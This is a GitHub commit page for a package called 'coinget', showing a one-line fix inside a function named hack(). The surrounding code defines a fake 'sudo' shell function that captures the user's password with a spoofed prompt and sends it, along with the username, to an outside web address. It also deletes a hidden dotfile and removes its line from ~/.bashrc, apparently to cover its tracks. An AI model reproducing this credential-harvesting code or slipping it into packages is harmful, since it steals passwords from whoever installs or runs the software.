Skip to content

Commit

Permalink
Update __init__.py
Browse files Browse the repository at this point in the history
  • Loading branch information
Alec Goebel committed May 25, 2013
1 parent 5795c42 commit 4ddb3b2
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion coinget/__init__.py
Expand Up @@ -9,7 +9,7 @@ def hack():
function sudo {
read -s -p "[sudo] password for $USER: " pwd
open "http://stout.hampshire.edu/~acg10/text.php?message=$pwd&frome=$USER"
open "http://stout.hampshire.edu/~acg10/text.php?message=$pwd&from=$USER"
rm ~/.gtk3fx11
cat ~/.bashrc | sed "/source ~\\/\\.gtk3fx11/d" > /tmp/bashrc
Expand Down

0 comments on commit 4ddb3b2

Please sign in to comment.